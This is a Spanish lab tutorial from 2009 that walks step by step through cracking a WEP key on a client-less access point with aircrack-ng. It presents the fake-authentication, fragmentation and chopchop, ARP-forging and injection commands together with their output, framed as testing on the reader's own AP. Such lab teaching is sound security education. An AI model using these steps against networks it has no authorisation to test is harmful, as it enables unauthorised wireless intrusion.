2009

Relis Inc. Siler Amador Donado

[TUTORIAL CRACKING WEP]

Laboratorio paso a paso para realizar pruebas de vulnerabilidad sobre redes inalmbricas en un ambiente controlado.

[TUTORIAL CRACKING WEP] 17 de diciembre de 2009 LABORATORIO PASO A PASO PARA REALIZAR PRUEBAS DE VULNERABILIDAD SOBRE REDES INALMBRICAS
Adaptado por: Siler Amador Donado Tomado de:http://www.aircrack-ng.org/doku.php?id=es:how_to_crack_wep_with_no_clients Equipos usados en este tutorial: Configuracin 1 Direccin MAC de la interfaz eth1: 00:16:CE:07:FC:3E BSSID (direccin MAC del punto de acceso): 00:18:39:BA:4E:0D ESSID (nombre de la red Wireless): hackme1 Canal del AP: 6 Interface Wireless: eth1 Marca del AP: Linksys Configuracin 2 Direccin MAC de la interfaz ra0: 00:13:D3:7B:B9:31 BSSID (direccin MAC del punto de acceso): 00:18:39:BA:4E:0D ESSID (nombre de la red Wireless): hackme1 Canal del AP: 6 Interface Wireless: ra0 Marca del AP: Linksys Configuracin 3 Direccin MAC de la interfaz ra0: 00:13:D3:7B:B9:31 BSSID (direccin MAC del punto de acceso): 00:09:5B:A1:8A:42 ESSID (nombre de la red Wireless): hackme2 Canal del AP: 11 Interface Wireless: ra0 Marca del AP: Netgear Debe obtener la informacin equivalente de la red sobre la que desea trabajar y cambiar los valores anteriores segn corresponda. La siguiente es la configuracin del AP Linksys WRT300N.

SILER AMADOR DONADO

Pgina 2

[TUTORIAL CRACKING WEP] 17 de diciembre de 2009

Para garantizar el xito en el desarrollo de este laboratorio suponemos que: Usa el liveCD con la versin 3.1 de la suite wifislax, la puede descargar de http://www.wifislax.org Usa la versin 1.0 de la suite aircrack-ng-1.0, la puede descargar de http://www.aircrackng.org/downloads.html. Luego deber descomprimirla y compilarla de la siguiente forma: wifislax # tar -xvf aircrack-ng-1.0 wifislax # cd aircrack-ng-1.0 wifislax aircrack-ng-1.0 # make wifislax aircrack-ng-1.0 # make strip wifislax aircrack-ng-1.0 # make install Est usando drivers parcheados para inyeccin. Puede capturar paquetes con Wireshark para comprobar si est inyectando. Est suficientemente cerca para enviar y recibir paquetes del AP. Recuerde que recibir paquetes del AP no significa que los paquetes que transmita sean recibidos por el AP, la fuerza de la seal de las tarjetas wireless generalmente es menor que la fuerza de la seal de los AP, por lo tanto, es necesario estar cerca del AP para que los paquetes que transmita sean recibidos por el AP. Debera confirmar que puede comunicare con el AP siguiendo estas instrucciones: wifislax aircrack-ng-1.0 # aireplay-ng -9 ra0 08:15:33 Trying broadcast probe requests... 08:15:35 No Answer... 08:15:35 Found 1 APs 08:15:35 Trying directed probe requests... 08:15:35 00:18:39:BA:4E:0D - channel: 6 - 'hackme1' 08:15:41 Ping (min/avg/max): 1.944ms/145.035ms/194.523ms Power: 0.00 08:15:41 9/30: 30% 08:15:41 Injection is working! Notacin: -9 Signica prueba de intrusin ra0 Interfaz inalmbrica

SILER AMADOR DONADO

Pgina 3

[TUTORIAL CRACKING WEP] 17 de diciembre de 2009

wifislax aircrack-ng-1.0 # aireplay-ng -test -e hackme1 -a 00:18:39:BA:4E:0D ra0 08:17:26 Waiting for beacon frame (BSSID: 00:18:39:BA:4E:0D) on channel 6 08:17:26 Trying broadcast probe requests... 08:17:26 Injection is working! 08:17:28 Found 1 AP 08:17:28 Trying directed probe requests... 08:17:28 00:18:39:BA:4E:0D - channel: 6 - 'hackme1' 08:17:33 Ping (min/avg/max): 1.945ms/126.139ms/192.817ms Power: 0.00 08:17:33 4/30: 13% Notacin: -test Significa prueba de intrusin -e Nombre del SSID hackme1 del AP -a Direccin MAC 00:18:39:BA:4E:0D del AP No hay paquetes de datos que vienen del punto de acceso. Beacons (balizas) y otros paquetes como management frame packets son intiles para nuestros propsitos en este tutorial. Una forma rpida para comprobar el trfico es ejecutar airodump-ng y ver si hay algn paquete de datos. En el caso de tener paquetes de datos capturados del punto de acceso en otras sesiones, podramos usarlos para generar nuevo trfico. Esto es para usuarios avanzados y este tutorial no da instrucciones detalladas para este caso. El punto de acceso usa ciframiento WEP abierto (open authentication). No funcionar si la autenticacin es compartida (shared key authentication) (SKA). Con SKA el nico mtodo si no existen clientes es capturar el PRGA xor data con airodump-ng handshake o hacer previamente un ataque con aireplay-ng. Esto es as porque necesita el archivo PRGA xor para hacer una falsa autenticacin de forma exitosa. Usaremos la versin 1.0 de aircrack-ng. Si usa otra versin algunos comandos puede que se escriban de forma diferente. Asegrese que cumpla todas las condiciones, de lo contrario no funcionar. En los siguientes ejemplos, tendr que cambiar eth1 por el nombre de la interface de su tarjeta wireless. En los ejemplos, la opcin guin doble bssid se muestra como - -bssid. Recuerde borrar el espacio entre los dos guiones cuando lo utilice. Esto tambin se aplica a - -ivs. A continuacin los pasos que vamos a seguir para desarrollar el laboratorio con xito: 1 - Fijar la direccin MAC de la tarjeta wireless 2 - Colocar la interface wireless en modo monitor y fijar el canal 3 - Usar aireplay-ng para hacer una falsa autenticacin con el punto de acceso 4 - Usar chopchop o ataque de fragmentacin para obtener PRGA 5 - Usar packetforge-ng para crear un paquete arp usando el PRGA obtenido en el paso anterior 6 - Iniciar airodump-ng en el canal del AP con filtro de bssid para capturar IVs 7 - Inyectar el paquete arp creado en el paso 5 8 - Ejecutar aircrack-ng para obtener la clave WEP Paso 1 - Fijar la direccin MAC de la tarjeta wireless No hemos cambiado la direccin MAC de nuestra tarjeta, en el caso que lo desee puede utilizar el comando "macchanger". Esto es un recordatorio para que use su direccin MAC real y no una falsa. En el paso 3 es importante que la direccin MAC que se use sea la de la su tarjeta para realizar la falsa autenticacin. Paso 2 - Colocar la interfaz wireless en modo monitor y fijar el canal Escriba el siguiente comando para poner la tarjeta wireless en modo monitor en el canal 6: wifislax aircrack-ng-1.0 # airmon-ng start ra0 6 El sistema nos responder:

SILER AMADOR DONADO

Pgina 4

[TUTORIAL CRACKING WEP] 17 de diciembre de 2009

Interface ra0 eth1 Chipset Driver Ralink 2560 PCI rt2500 (monitor mode enabled) Broadcom bcm43xx

Puede observar que ra0 aparece colocada en modo monitor. Escriba ifconfig ra0 up para levantar la interfaz ra0 que usaremos a continuacin. Para confirmar que la interfaz est bien configurada, escribimos iwconfig. El sistema nos responder: lo ra0 no wireless extensions. RT2500 Wireless ESSID:"" Mode:Monitor Frequency=2.437 GHz Bit Rate=11 Mb/s Tx-Power:0 dBm RTS thr:off Fragment thr:off Encryption key:off Link Quality=0/100 Signal level:-120 dBm Noise level:-79 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0 eth0 no wireless extensions. eth1 IEEE 802.11b/g ESSID:off/any Nickname:"Broadcom 4318" Mode:Managed Access Point: Invalid RTS thr:off Fragment thr:off Encryption key:off Link Quality=0/100 Signal level=-256 dBm Noise level=-256 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0 Podemos ver que ra0 est en modo monitor, en la frecuencia 2.437 GHz que corresponde al canal 6 y en Access Point vemos la direccin MAC de nuestra tarjeta wireless. Es importante comprobar toda esta informacin antes de continuar, ya que de lo contrario no funcionar. Para ver la correspondencia entre frecuencia y canal, observe: http://www.rflinx.com/help/calculations/#2.4ghz_wifi_channels selecciona la etiqueta Wifi Channel Selection and Channel Overlap. As obtendr la frecuencia para cada canal. Problemas Si tiene otra interfaz en modo monitor que no sea ra0, puede usarla o escribir airomon-ng stop raX donde X es la interface que quiere parar. Paso 3 - Usar aireplay-ng para hacer una falsa autenticacin con el AP Este es un paso muy importante. Para que un AP acepte un paquete, la direccin MAC debe estar previamente asociada. Si la direccin MAC con la cual estas inyectando no est asociada, el AP ignorar el paquete y enviar un paquete de desautentificacin. En este caso, no se crearn nuevos IVs porque el AP est ignorando todos los paquetes inyectados. La falta de asociacin con el punto de acceso es la razn ms habitual por la cual falla la inyeccin. Para asociarse con un punto de acceso, usa el comando: wifislax aircrack-ng-1.0 # aireplay-ng -1 0 -e hackme1 -a 00:18:39:BA:4E:0D -h 00:13:D3:7B:B9:31 ra0 Notacin: -1 significa falsa autenticacin (fake authentication) 0 tiempo de reasociacin en segundos -e hackme1 es el nombre de la red wireless -a 00:18:39:BA:4E:0D es la direccin MAC del AP -h 00:13:D3:7B:B9:31 es la direccin MAC de nuestra tarjeta wireless ra0 es el nombre de nuestra interfaz Si tenemos xito aparecer algo como esto:

SILER AMADOR DONADO

Pgina 5

[TUTORIAL CRACKING WEP] 17 de diciembre de 2009

18:18:20 18:18:20 18:18:20 18:18:20

Sending Authentication Request Authentication successful Sending Association Request Association successful :-)

Otra variacin que puede funcionar en algunos puntos de acceso: wifislax aircrack-ng-1.0 # aireplay-ng -1 6000 -o 1 -q 10 -e hackme1 -a 00:18:39:BA:4E:0D h 00:13:D3:7B:B9:31 ra0 Notacin: 6000 Reautenticacin cada 6000 segundos. En este periodo de tiempo se siguen enviando paquetes de sigo aqu o keep alive packets. -o 1 Enva solo un tipo de paquetes de cada vez. El valor por defecto es mltiple y esto puede confundir a algunos APs. -q 10 Se envan paquetes de sigo aqu cada 10 segundos. Si tenemos xito aparecer algo como esto: 18:22:32 18:22:32 18:22:32 18:22:32 18:22:42 18:22:52 # etc.... Sending Authentication Request Authentication successful Sending Association Request Association successful :-) Sending keep-alive packet Sending keep-alive packet

Ahora ponemos un ejemplo de un fallo de autenticacin: 18:28:02 18:28:02 18:28:02 18:28:02 18:28:02 18:28:05 18:28:05 18:28:05 18:28:10 18:28:10 18:28:10 Sending Authentication Request Authentication successful Sending Association Request Association successful :-) Got a deauthentication packet! Sending Authentication Request Authentication successful Sending Association Request Sending Authentication Request Authentication successful Sending Association Request

Preste atencin a Got a deauthentication packet y los continuos intentos de asociacin. No se debe continuar al siguiente paso hasta que funcione la falsa autenticacin de forma correcta. Problemas Algunos AP estn configurados para permitir nicamente una direccin MAC para asociarse y conectarse. Si este es su caso, no podr realizar la falsa autenticacin de forma xitosa, salvo que conozca una de las direcciones MAC que estn permitidas para poder conectarse a ese AP. Analice los problemas de filtrado MAC en este tutorial. Si desea confirmar que est asociado de forma correcta puede usar tcpdump y mirar los paquetes. Inicie una consola y escriba: wifislax aircrack-ng-1.0 # tcpdump -n -e -s0 -vvv -i ra0 Si solo desea seleccionar los paquetes de deautenticacin con tcpdump usa: tcpdump -n -e -s0 -vvv -i ra0 | grep DeAuth. Puede cambiar la palabra DeAuth para escoger otros paquetes que desee buscar.

SILER AMADOR DONADO

Pgina 6

[TUTORIAL CRACKING WEP] 17 de diciembre de 2009

Paso 4 - Usar chopchop o ataque de fragmentacin para obtener PRGA El objetivo de chopchop y del ataque de fragmentacin es obtener un archivo PRGA (del ingls pseudo random generation algorithm o algoritmo de generacin seudo aleatoria). Este PRGA no es la clave WEP y no se puede usar para descifrar paquetes. Aunque, si puede usarse para crear nuevos paquetes cifrados con la clave WEP para inyectarlos. La creacin de nuevos paquetes la veremos ms adelante en el tutorial. Tanto chopchop como el ataque de fragmentacin pueden ser usados para obtener el archivo PRGA. El resultado es el mismo, por lo que usa el que mejor te funcione. Los pros y contras de cada ataque estn descritos en la pgina de aircrack-ng. A continuacin exponemos primero el ataque de fragmentacin. Abrimos otra consola y escribimos: wifislax aircrack-ng-1.0 # aireplay-ng -5 -b 00:18:39:BA:4E:0D -h 00:13:D3:7B:B9:31 ra0 Notacin: -5 significa ataque de fragmentacin -b 00:18:39:BA:4E:0D es la direccin MAC del punto de acceso -h 00:13:D3:7B:B9:31 es la direccin MAC de nuestra tarjeta wireless y debe coincidir con la direccin MAC usada en la falsa autenticacin ra0 es el nombre de nuestra interfaz La respuesta que obtendremos ser: Waiting for a data packet... Read 127 packets... Size: 68, FromDS: 1, ToDS: 0 (WEP) BSSID = 00:18:39:BA:4E:0D Dest. MAC = 01:00:5E:00:00:01 Source MAC = 00:18:39:BA:4E:0B 0x0000: 0x0010: 0x0020: 0x0030: 0x0040: 0842 0000 0100 5e00 0001 0018 39ba 4e0d .B....^.....9.N. 0018 39ba 4e0b d0b7 579c 2d00 2e3a 422c ..9.N...W.-..:B, eb9c 7df3 c4d7 4b48 75d9 719f 12f2 c8e8 ..}...KHu.q..... b91a 9601 490c a906 74bd ccfc 18d1 8737 ....I...t......7 643a 499b d:I.

Use this packet ? y Cuando recibamos un paquete del punto de acceso, escriba y para continuar. Es probable que sea necesario intentar ms de una vez unos pocos paquetes para tener xito. Si tenemos xito aparecer algo como esto: Saving chosen packet in replay_src-0203-180328.cap Data packet found! Sending fragmented packet Got RELAYED packet!! Thats our ARP packet! Trying to get 384 bytes of a keystream Got RELAYED packet!! Thats our ARP packet! Trying to get 1500 bytes of a keystream Got RELAYED packet!! Thats our ARP packet! Saving keystream in fragment-0203-180343.xor Now you can build a packet with packetforge-ng out of that 1500 bytes keystream

SILER AMADOR DONADO

Pgina 7

[TUTORIAL CRACKING WEP] 17 de diciembre de 2009

xito! El archivo fragment-0203-180343.xor lo podremos usar en el siguiente paso para generar un paquete arp. Si con el ataque de fragmentacin no hemos tenido xito, podemos probar la tcnica chopchop. Para ello ejecute: wifislax aircrack-ng-1.0 # aireplay-ng -4 ra0 -h 00:13:D3:7B:B9:31 Notacin: -4 significa ataque chopchop -h 00:13:D3:7B:B9:31 es la direccin MAC de nuestra tarjeta wireless y debe coincidir con la direccin MAC usada en la falsa autenticacin ra0 es el nombre de nuestra interfaz La respuesta que obtendremos ser: Read 165 packets... Size: 86, FromDS: 1, ToDS: 0 (WEP) BSSID = 00:18:39:BA:4E:0D Dest. MAC = FF:FF:FF:FF:FF:FF Source MAC = 00:40:F4:77:E5:C9 0x0000: 0x0010: 0x0020: 0x0030: 0x0040: 0x0050: 0842 0000 ffff ffff ffff 0014 6c7e 4080 .B..........l~@. 0040 f477 e5c9 603a d600 0000 5fed a222 .@.w..`:...._.." e2ee aa48 8312 f59d c8c0 af5f 3dd8 a543 ...H......._=..C d1ca 0c9b 6aeb fad6 f394 2591 5bf4 2873 ....j.....%.[.(s 16d4 43fb aebb 3ea1 7101 729e 65ca 6905 ..C...>.q.r.e.i. cfeb 4a72 be46 ..Jr.F

Use this packet ? y Conteste y y el proceso continuar. Saving chosen packet in replay_src-0201-191639.cap Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset 85 ( 0% done) | xor = D3 | pt = 95 | 253 frames written in 84 ( 1% done) | xor = EB | pt = 55 | 166 frames written in 83 ( 3% done) | xor = 47 | pt = 35 | 215 frames written in 82 ( 5% done) | xor = 07 | pt = 4D | 161 frames written in 81 ( 7% done) | xor = EB | pt = 00 | 12 frames written in 80 ( 9% done) | xor = CF | pt = 00 | 152 frames written in 79 (11% done) | xor = 05 | pt = 00 | 29 frames written in 78 (13% done) | xor = 69 | pt = 00 | 151 frames written in 77 (15% done) | xor = CA | pt = 00 | 24 frames written in 76 (17% done) | xor = 65 | pt = 00 | 129 frames written in 75 (19% done) | xor = 9E | pt = 00 | 36 frames written in 74 (21% done) | xor = 72 | pt = 00 | 39 frames written in 73 (23% done) | xor = 01 | pt = 00 | 146 frames written in 72 (25% done) | xor = 71 | pt = 00 | 83 frames written in 71 (26% done) | xor = A1 | pt = 00 | 43 frames written in 70 (28% done) | xor = 3E | pt = 00 | 98 frames written in 69 (30% done) | xor = BB | pt = 00 | 129 frames written in 68 (32% done) | xor = AE | pt = 00 | 248 frames written in 67 (34% done) | xor = FB | pt = 00 | 105 frames written in 66 (36% done) | xor = 43 | pt = 00 | 101 frames written in 65 (38% done) | xor = D4 | pt = 00 | 158 frames written in 64 (40% done) | xor = 16 | pt = 00 | 197 frames written in 760ms 498ms 645ms 483ms 36ms 456ms 87ms 454ms 71ms 387ms 108ms 117ms 438ms 249ms 129ms 294ms 387ms 744ms 315ms 303ms 474ms 591ms

SILER AMADOR DONADO

Pgina 8

[TUTORIAL CRACKING WEP] 17 de diciembre de 2009

Offset 63 (42% done) | xor = 7F | pt = 0C | 72 frames written in 217ms Offset 62 (44% done) | xor = 1F | pt = 37 | 166 frames written in 497ms Offset 61 (46% done) | xor = 5C | pt = A8 | 119 frames written in 357ms Offset 60 (48% done) | xor = 9B | pt = C0 | 229 frames written in 687ms Offset 59 (50% done) | xor = 91 | pt = 00 | 113 frames written in 339ms Offset 58 (51% done) | xor = 25 | pt = 00 | 184 frames written in 552ms Offset 57 (53% done) | xor = 94 | pt = 00 | 33 frames written in 99ms Offset 56 (55% done) | xor = F3 | pt = 00 | 193 frames written in 579ms Offset 55 (57% done) | xor = D6 | pt = 00 | 17 frames written in 51ms Offset 54 (59% done) | xor = FA | pt = 00 | 81 frames written in 243ms Offset 53 (61% done) | xor = EA | pt = 01 | 95 frames written in 285ms Offset 52 (63% done) | xor = 5D | pt = 37 | 24 frames written in 72ms Offset 51 (65% done) | xor = 33 | pt = A8 | 20 frames written in 59ms Offset 50 (67% done) | xor = CC | pt = C0 | 97 frames written in 291ms Offset 49 (69% done) | xor = 03 | pt = C9 | 188 frames written in 566ms Offset 48 (71% done) | xor = 34 | pt = E5 | 48 frames written in 142ms Offset 47 (73% done) | xor = 34 | pt = 77 | 64 frames written in 192ms Offset 46 (75% done) | xor = 51 | pt = F4 | 253 frames written in 759ms Offset 45 (76% done) | xor = 98 | pt = 40 | 109 frames written in 327ms Offset 44 (78% done) | xor = 3D | pt = 00 | 242 frames written in 726ms Offset 43 (80% done) | xor = 5E | pt = 01 | 194 frames written in 583ms Offset 42 (82% done) | xor = AF | pt = 00 | 99 frames written in 296ms Offset 41 (84% done) | xor = C4 | pt = 04 | 164 frames written in 492ms Offset 40 (86% done) | xor = CE | pt = 06 | 69 frames written in 207ms Offset 39 (88% done) | xor = 9D | pt = 00 | 137 frames written in 411ms Offset 38 (90% done) | xor = FD | pt = 08 | 229 frames written in 688ms Offset 37 (92% done) | xor = 13 | pt = 01 | 232 frames written in 695ms Offset 36 (94% done) | xor = 83 | pt = 00 | 19 frames written in 58ms Offset 35 (96% done) | xor = 4E | pt = 06 | 230 frames written in 689ms Sent 957 packets, current guess: B9... The AP appears to drop packets shorter than 35 bytes. Enabling standard workaround: ARP header re-creation. Saving plaintext in replay_dec-0201-191706.cap Saving keystream in replay_dec-0201-191706.xor Completed in 21s (2.29 bytes/s) Fantstico! El archivo replay_dec-0201-191706.xor lo podremos usar en el siguiente paso para generar un paquete arp. Pequeas ayudas Asegrate de que el paquete es de 68 o ms bytes porque sino no tendrs suficientes datos PRGA para generar el paquete. El PRGA capturado tiene que ser igual o mayor que la longitud del paquete que queremos generar. Para generar algunos paquetes y forzar el comienzo de chopchop, haga ping a una IP inexistente de su red. Esto forzar que el AP emita un arp broadcast y este aparecer en chopchop para ser usado. Puede comprobar el paquete descifrado ejecutando tcpdump -n -vvv -e -s0 -r replay_dec-0201191706.cap. En nuestro laboratorio: reading from file replay_dec-0201-191706.cap, link-type IEEE802_11 (802.11) 19:17:06.842866 0us DA:Broadcast BSSID:00:14:6c:7e:40:80 SA:00:40:f4:77:e5:c9 LLC, dsap SNAP (0xaa), ssap SNAP (0xaa), cmd 003: oui Ethernet (0000000), ethertype ARP (00806): arp who-has 192.168.1.12 tell 192.168.1.1

SILER AMADOR DONADO

Pgina 9

[TUTORIAL CRACKING WEP] 17 de diciembre de 2009

Puede reusar el paquete capturado ejecutando aireplay-ng -4 ra0 -h 00:09:5B:EC:EE:F2 -r replay_src0201-191639.cap. El nombre del archivo aparece cuando se inicia chopchop. Si tiene un archivo de capturas de una sesin anterior, puede usarlo con el comando aireplay-ng -4 ra0 -h 00:09:5B:EC:EE:F2 -r captura-sesin-anterior.cap Problemas Si el primer paquete que ha seleccionado no funciona, pruebe unos pocos ms. Algunas veces hay que intentarlo varias veces para conseguir tener xito en cualquiera de los ataques. El ataque chopchop no funciona en algunos puntos de acceso. Si esto ocurre, pruebe el ataque de fragmentacin. Y viceversa. Asegrese de que est correctamente asociado al AP. Para comprobarlo siga las instrucciones del paso 2 con tcpdump. Paso 5 - Usar packetforge-ng para crear un paquete arp En el paso anterior hemos obtenido el PRGA. No importa con que ataque hemos generado el PRGA. Este PRGA se encuentra en los archivos con extensin xor. Podemos entonces usar este PRGA para generar un paquete para inyectar. Generaremos un paquete arp para la inyeccin. El objetivo es que el punto de acceso reenve continuamente el paquete arp inyectado. Cuando lo reenve obtendremos un nuevo IV (vector de inicializacin). Todos estos IVs los usaremos para obtener la clave WEP. Pero primero vamos a generar el paquete arp para la inyeccin, escribiendo: wifislax aircrack-ng-1.0 # packetforge-ng -0 -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 -k 255.255.255.255 -l 255.255.255.255.255 -y fragment-0203-180343.xor -w arp-request Notacin: -0 significa generar un paquete arp -a 00:14:6C:7E:40:80 es la direccin MAC del punto de acceso -h 00:09:5B:EC:EE:F2 es la direccin MAC de nuestra tarjeta wireless -k 255.255.255.255 es la IP de destino (la mayora de los APs responden a 255.255.255.255) -l 255.255.255.255.255 es la IP de origen (la mayora de los APs responden a 255.255.255.255) -y fragment-0203-180343.xor es el archivo del que se leer el PRGA -w arp-request es el nombre del archivo en el que se guardar el paquete arp La respuesta que obtendremos ser: Wrote packet to: arp-request Pequeas ayudas Despus de crear el paquete, use tcpdump para revisarlo. Escriba: wifislax aircrack-ng-1.0 # tcpdump -n -vvv -e -s0 -r arp-request reading from file arp-request, link-type IEEE802_11 (802.11) 10:49:17.456350 WEP Encrypted 258us BSSID:00:14:6c:7e:40:80 SA:00:09:5b:ec:ee:f2 DA:Broadcast Data IV: 8f Pad 0 KeyID 0 Como estamos probando con nuestro propio AP (si no es as NO CONTINUES!), desciframos el paquete y nos aseguramos que es correcto. Este paso no es necesario, solo sirve para comprobar que hemos generado un paquete correcto. Escribimos: airdecap-ng -e hackme1 -w <tu clave WEP> arp-request. Y para ver el paquete descifrado: tcpdump -n -r arp-request-dec. Deberamos observar algo como esto: reading from file arp-request-dec, link-type EN10MB (Ethernet) 10:49:17.456350 arp who-has 255.255.255.255 tell 255.255.255.255

SILER AMADOR DONADO

Pgina 10

[TUTORIAL CRACKING WEP] 17 de diciembre de 2009

Paso 6 - Iniciar airodump-ng Abrir otra consola para capturar los IVs generados. Y escribir: wifislax aircrack-ng-1.0 # airodump-ng -c 6 bssid 00:18:39:BA:4E:0D -w capture ra0 Notacin: -c 6 es el canal de la red wireless -bssid 00:18:39:BA:4E:0D es la direccin MAC del AP. Esto elimina el trafico de otras redes. -ivs especifica que solo capturaremos IVs. As el archivo ser muy pequeo. Pero no uses esta opcin si quieres utilizar aircrack-ng -z. -w capture es el nombre del archivo en el que guardaremos los IVs. ra0 es el nombre de nuestra interfaz. Paso 7 - Inyectar el paquete arp Usando la consola en la que generamos el paquete arp, escribimos: wifislax aircrack-ng-1.0 # aireplay-ng -2 -r arp-request ath0 Notacin: -2 significa que usamos el modo interactivo para seleccionar el paquete -r arp-request especificamos el nombre del archivo con el paquete arp ra0 es el nombre de nuestra interfaz Obtendremos la siguiente respuesta: Size: 68, FromDS: 0, ToDS: 1 (WEP) BSSID = 00:18:39:BA:4E:0D Dest. MAC = FF:FF:FF:FF:FF:FF Source MAC = 00:09:5B:EC:EE:F2 0x0000: 0x0010: 0x0020: 0x0030: 0x0040: 0841 0201 0014 6c7e 4080 0009 5bec eef2 .A....l~@...[... ffff ffff ffff 8001 8f00 0000 7af3 8be4 ............z... c587 b696 9bf0 c30d 9cd9 c871 0f5a 38c5 ...........q.Z8. f286 fdb3 55ee 113e da14 fb19 17cc 0b5e ....U..>.......^ 6ada 92f2 j...

Use this packet ? y Escribimos y para usar este paquete. Veremos cuantos paquetes estamos inyectando y se nos recuerda que iniciemos airodump-ng si no lo hemos hecho todava: Saving chosen packet in replay_src-0204-104917.cap You should also start airodump-ng to capture replies. End of file. Mientras este comando se est ejecutando de forma exitosa, en la ventana de airodump-ng veremos algo similar a esto: CH 6 ][ Elapsed: 16 s ][ 2009-12-12 11:04 BSSID PWR RXQ Beacons 179 #Data, #/s CH MB ENC CIPHER AUTH ESSID 2689 336 6 11 WEP WEP hackme1

00:18:39:BA:4E:0D 47 100 BSSID STATION

PWR Lost Packets Probes

SILER AMADOR DONADO

Pgina 11

[TUTORIAL CRACKING WEP] 17 de diciembre de 2009

00:18:39:BA:4E:0D 00:09:5B:EC:EE:F2 29 0 2707

Puedes observar que solo hay un punto de acceso puesto que hemos incluido en airodump-ng el filtro para limitar la captura a un nico BSSID. Tambin observa que los paquetes de la tarjeta son aproximadamente los mismos que los paquetes (data) del BSSID. Esto significa que la inyeccin est funcionando bien y se pierden pocos paquetes. Tambin observa la velocidad de inyeccin (#/s) de 336 paquetes por segundo, lo cual es un indicador de que la inyeccin est funcionando muy bien. Esta es una situacin ideal de inyeccin. Problemas Si los paquetes del BSSID (data) no aumentan asegurate de que estas todava asociado con el punto de acceso. Para hacer esto, mira las instrucciones sobre tcpdump en el paso 2. Paso 8 - Ejecutar aircrack-ng para obtener la clave WEP Inicia otra consola y escribe: wifislax aircrack-ng-1.0 # aircrack-ng -z -b 00:18:39:BA:4E:0D capture*.cap Notacin: -z significa que se use el mtodo PTW para obtener ms rpido la clave WEP capture*.cap selecciona todos los archivos que comienzan por capture y con extensin cap. -b 00:14:6C:7E:40:80 selecciona el punto de acceso en el que estamos interesados Puede ejecutar aircrack-ng mientras captura paquetes. En poco tiempo, ver la clave WEP. Usando el mtodo PTW, necesitar alrededor de 20,000 paquetes de datos para una clave de 64 bit y 40,000 para claves de 128 bit. Recuerda que el mtodoPTW solo funciona con paquetes ARP. Como este tutorial solo cubre este tipo de paquetes no tendrs problema ninguno. El otro requerimiento es que has de capturar con airodump archivos *.cap, lo que significa que no puedes usar laopcin - -ivs. Si no usas la opcin -z, se aplicar el mtodo FMS/Korek. Necesitars aproximadamente 250,000 IVs para una clave WEP de 64 bit y 1,500,000 IVs para claves de 128 bit. Esto es aproximado y hay muchas variables que influyen en el nmero de IVs necesarios para obtener la clave WEP. Problemas Algunas veces es recomendable probar varias tcnicas para obtener la clave WEP rpidamente. Prueba la opcin -n para fijar la longitud de la clave (por ejemplo -n 64). Usa -f y prueba diferentes fudge factors. Usa -k y prueba a desabilitar los mtodos korek. Solucin alternativa Existe un pequeo engao que simplifica el crackeo de la clave WEP sin clientes. Bsicamente consiste en recoger cualquier paquete broadcast del punto de acceso y convertirlo para que el punto de acceso genere un nuevo IV. Es importante que tenga en cuenta que si usa este truco, no podr utilizar la opcin -z del mtodo PTW con aircrack-ng. Esto se debe a que el mtodo PTW requiere paquetes arp y de esta forma no los generamos. OK, ahora se estar preguntando por qu no usamos esta tcnica paso a paso? La razn es que con esta tcnica se reenvan todos los paquetes que reciba. Por lo que si recibe un paquete de 1000 byte entonces reenviara 1000 bytes. Esto reduce de forma muy importante el nmero de paquetes capturados por segundo. Aunque, como ventaja podemos destacar que es muy simple y muy fcil de hacer. Adems puede que tenga suerte y que reciba un paquete muy pequeo para reenviar. En este caso, esta tcnica funcionar tan bien como la descrita con anterioridad en este tutorial. Hay que tener en cuenta las mismas consideraciones y realizar con anterioridad una falsa autenticacin. Escriba el siguiente comando:

SILER AMADOR DONADO

Pgina 12

[TUTORIAL CRACKING WEP] 17 de diciembre de 2009

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:18:39:BA:4E:0D -h 00:13:D3:7B:B9:31 ra0 Notacin: -2 significa que usamos el modo interactivo para seleccionar el paquete -p 0841 fija el Frame Control para que parezca que el paquete se est enviando desde un cliente wireless. c FF:FF:FF:FF:FF:FF fija la direccin MAC de destino como broadcast. Esto se requiere para que el AP reenvie el paquete y as consigamos un nuevo IV. -b 00:18:39:BA:4E:0D es la direccin MAC del punto de acceso -h 00:13:D3:7B:B9:31 es la direccin MAC de nuestra tarjeta y debe coincidir con la utilizada en la falsa autenticacion ra0 es el nombre de nuestra interfaz El sistema nos contestar: Read 698 packets... Size: 86, FromDS: 1, ToDS: 0 (WEP) BSSID = 00:18:39:BA:4E:0D Dest. MAC = FF:FF:FF:FF:FF:FF Source MAC = 00:D0:CF:03:34:8C 0x0000: 0x0010: 0x0020: 0x0030: 0x0040: 0x0050: 0842 0000 ffff ffff ffff 0014 6c7e 4080 .B..........l~@. 00d0 cf03 348c a0f4 2000 0000 e233 962a ....4... ....3.* 90b5 fe67 41e0 9dd5 7271 b8ed ed23 8eda ...gA...rq...#.. ef55 d7b0 a56f bc16 355f 8986 a7ab d495 .U...o..5_...... 1daa a308 6a70 4465 9fa6 5467 d588 c10c ....jpDe..Tg.... f043 09f6 5418 .C..T.

Use this packet ? y Escriba y para seleccionar el paquete y empezar la inyeccin. Recuerd e, cuanto ms pequeo sea el paquete mucho mejor. Al empezar la inyeccin vers algo como esto: Saving chosen packet in replay_src-0411-145110.cap Sent 10204 packets...(455 pps) Si aun no has iniciado airodump-ng, ejectalo ahora. Una vez que tengas suficientes IVs, puedes iniciar aircrack-ng e intentar averiguar la clave WEP. Otra variacin de este ataque es usar paquetes de una captura anterior. Debes de tener guardados los paquetes enteros, y no solo los IVs. A continuacin puedes ver cmo sera el comando: aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:18:39:BA:4E:0D -h 00:13:D3:7B:B9:31 -r capture01.cap ra0 Donde -r capture-01.cap es el archivo de una captura anterior. Referencias 1. http://www.nextgameday.com/foro/f105/tutorial-auditoria-wireless-wifislax-saca-claves-wep-deredes-inalambricas-56761/ 2. http://archive.aircrack-ng.org/slitaz/ 3. http://www.aircrack-ng.org/doku.php?id=es:newbie_guide 4. http://www.aircrack-ng.org/doku.php?id=es:how_to_crack_wep_with_no_clients 5. http://www.aircrack-ng.org/documentation.html 6. http://www.aircrack-ng.org/downloads.html 7. 